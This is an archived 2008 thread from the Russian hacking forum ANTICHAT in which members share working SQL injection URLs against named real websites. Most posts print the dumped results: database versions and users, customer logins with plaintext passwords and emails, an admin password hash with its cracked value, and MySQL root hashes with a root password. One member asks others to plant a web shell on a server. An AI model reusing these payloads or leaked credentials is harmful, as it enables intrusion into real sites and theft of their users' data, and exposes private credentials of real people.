ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.01.2008, 14:14
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
vimkon.ru интернет-магазин
http://www.vimkon.ru/news.php3?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version( ),database(),user()),8,9/*
5.0.45/vimkon/vimkon@localhost
http://www.vimkon.ru/news.php3?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,login,pa ss,email),8,9+from+client+limit+100,1/*
логин/пароль/мейл
algis/algisf1/info@algis.ru
|
|
|
09.01.2008, 14:44
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
www.freeru.info
Код:
http://www.freeru.info/category.php/?cat1=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),15,16,CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME),18,19,20 FROM INFORMATION_SCHEMA.TABLES/*
10-key.ru
Код:
http://10-key.ru/contests.php?mod=2' AND 1=2 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME),6,7,8,9,10 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA<>'information_schema'/*
Оба сайта на одном серваке... так вот если кто нить зальет шелл, у мну например скока не пытался не получилось, буду очень признателен если вы мне об этом сообщите...
как бонус читалка хтмлок на этом же сервере:
Код:
http://olva-stroy.ru/index.php?str=
__________________
Кто я?..
|
|
|
|
09.01.2008, 14:59
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
thefetus.net
Код HTML:
http://www.thefetus.net/page.php?id=-1149+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8,9,10,11,12,13/*
USER:fetus@localhost
VERSION:5.0.37-community-nt
DATABASE:thefetus
Код HTML:
http://www.thefetus.net/page.php?id=-1149+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+95,100/*
- все таблици
Код HTML:
http://www.thefetus.net/page.php?id=-1149+union+select+0,column_name,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns/*
- все столбци
chilliwackheritagepark.com
Код HTML:
http://www.chilliwackheritagepark.com/page.php?id=-50+union+select+0,1,2,3,4,5,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),7,8,9,10,11,12,13,14,15,16,17,18/*
USER:chwk_arts@localhost
VERSION:4.1.16
DATABASE:chwk_arts
|
|
|
|
09.01.2008, 15:01
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
property-fund.ru
http://www.property-fund.ru/ru/news_show.phtml?news=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,ve rsion(),database(),user()),11,12,13,14,15/*
4.1.20/profnd/profnd@localhost
http://www.property-fund.ru/ru/news_show.phtml?news=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,us ername,user_password,user_email),11,12,13,14,15+fr om+phpbb_users+limit+1,1/*
логин/хеш/мейл
admin/21232f297a57a5a743894a0e4a801fc3/admin@admin.ru
Юзаем http://md5.xek.cc/
21232f297a57a5a743894a0e4a801fc3; admin
|
|
|
|
09.01.2008, 17:19
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
wwwrsphysse.anu.edu.au
Код:
http://wwwrsphysse.anu.edu.au/nuclear/personnel.php?id=-50 UNION SELECT 1,2,3,CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME),5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA<>0x494E464F524D4154494F4E5F534348454D41/*
почти edu)))
__________________
Кто я?..
|
|
|
|
09.01.2008, 17:55
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
http://www.democracy.ru/
Код:
http://www.democracy.ru/article.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3A,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16/*
Организация ИРИС, цель которой "донести до избирателя реальные цели и задачи кандидатов, оплот демократии" (примерно так, не цитата, но смысл ясен). '99 года выпуска. Инъекция совершенно лобовая. БД 4, таблицы не подобрал.
З.Ы. Ипал я в рот такую демократию, на индексе почти все топики о "Национальном лидере России В.В. Путине". Короче очередная продажная организация.
|
|
|
|
09.01.2008, 21:14
|
|
Новичок
Регистрация: 08.01.2008
Сообщений: 1
Провел на форуме:
6801
Репутация:
6
|
|
alterego.tut.by
homenet.tut.by
Толком ничего не накопал,но ресурс вроде известен.
_____________
http://alterego.tut.by/library/showarticle.php?id=-65%20UNION%20SELECT%201,version(),user(),database( ),5,6/*
_____________
http://homenet.tut.by/?action=notes&id=24471' - тут вообще нихрена не копается =\
_____________
P.S. Не судите строго,в хокинге я пока новичок.Да и ламарез в мск сьебался - некому учить =(
Последний раз редактировалось SametZ; 09.01.2008 в 21:23..
|
|
|
|
09.01.2008, 22:05
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Сообщение от SametZ
http://homenet.tut.by/?action=notes&id=24471' - тут вообще нихрена не копается =\
Тут нет инжекции(
tgao.ca
Код HTML:
http://www.tgao.ca/page.php?id=-9+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/*
USER:tgao_tgao2@localhost
VERSION:5.0.27-standard
DATABASE:tgao_tgao2
Код HTML:
http://www.tgao.ca/page.php?id=-9+union+select+0,1,table_name,3+from+information_schema.tables+limit+45,1/*
Код HTML:
http://www.tgao.ca/page.php?id=-9+union+select+0,1,column_name,3+from+information_schema.columns+limit+0,1/*
lucon.ru
Код HTML:
http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),6,7,8,9/*
USER:lucon1@localhost
VERSION:5.0.24-standard
DATABASE:db_lucon1
Код HTML:
http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,table_name,6,7,8,9+from+information_schema.tables/*
- все таблици
Код HTML:
http://www.lucon.ru/page.php?lev1=20+union+select+0,1,2,3,4,column_name,6,7,8,9+from+information_schema.columns/*
- все поля
alex-travel.ru
Код HTML:
http://www.alex-travel.ru/strana.php?strana=2+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*
|
|
|
|
10.01.2008, 00:21
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
www.api.org.il
http://www.api.org.il/Съезды-c--22+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat (user,0x3a,password),6,7,8,9+from+mysql.user+limit +0,1/*.html
5.0.32-Debian_7etch3-log
root:*1611455133BEB42BD070C44CBDCDCAEDB73E9156: l1n22q
http://www.api.org.il/admin/index.php
есть только пасс от рута базы ( l1n22q) ... логин подобрать с админке не могу ... авось и пасс другой ((
есть таблы (users,adm_users) итд ... но в них не попасть или я сильно туплю...
|
|
|
|
10.01.2008, 01:17
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://www.sieve.gr/gr/news.php?id=-142+union+select+1,2,concat_ws(0x2f,version(),user (),database()),4/*
4.1.22-standard/sieve@localhost/sieve_gr
Есть таблица users
Колонки в ней не подобрал
-----------------------------------------------------------------------
http://www.x-plorer.gr/news.php?id=-8+union+select+1,2,concat(user,char(58),password), 4,5+from+mysql.user/*
root:*046A241131BA9D25793B8012B8DCA213827E3DB9
Все таблицы
http://www.x-plorer.gr/news.php?id=-8+union+select+table_name,2,3,4,5+from+information _schema.tables/*
Все колонки
http://www.x-plorer.gr/news.php?id=-8+union+select+column_name,2,3,4,5+from+informatio n_schema.columns/*
Там есть еще и phpBB форум))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
